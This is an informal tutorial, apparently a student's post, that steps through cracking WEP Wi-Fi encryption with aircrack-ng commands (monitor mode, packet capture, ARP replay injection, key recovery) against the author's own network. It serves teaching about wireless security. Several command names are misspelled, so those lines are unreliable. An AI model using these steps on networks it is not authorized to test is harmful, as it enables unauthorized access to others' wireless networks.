Hi in the class the operating system we are seeing the security i decided show you how to crack encryption wep because i think is important know the vulnerability of the algorithms
I use my connection for this example and i need change the WPA to WEP for this example in other case i'll show you how to crack a WPA
See the Wikipedia definition Wired Equivalent Privacy (WEP)
I use backtrack 5 and in this case the suit of aircrack-ng
Now we need write on the shell airmon-ng
Then wee see our interface in my case is wlan0
Now write in the shell
airmong-ng wlan0 start
Then write on the shell airodump-ng mon0 and you see the EDDID available
Then write airodump-ng -w wep -c channel --bssid your-bssid mon0
aireplay-ng -1 0 -a bssid mon0
In another shell write airplay-ng -3 -b bssid mon0
In another shell write aircrack-ng wep-01.cap
In the next image see in the shell KEY FOUND
Greetings i hope you liked :D
:P +2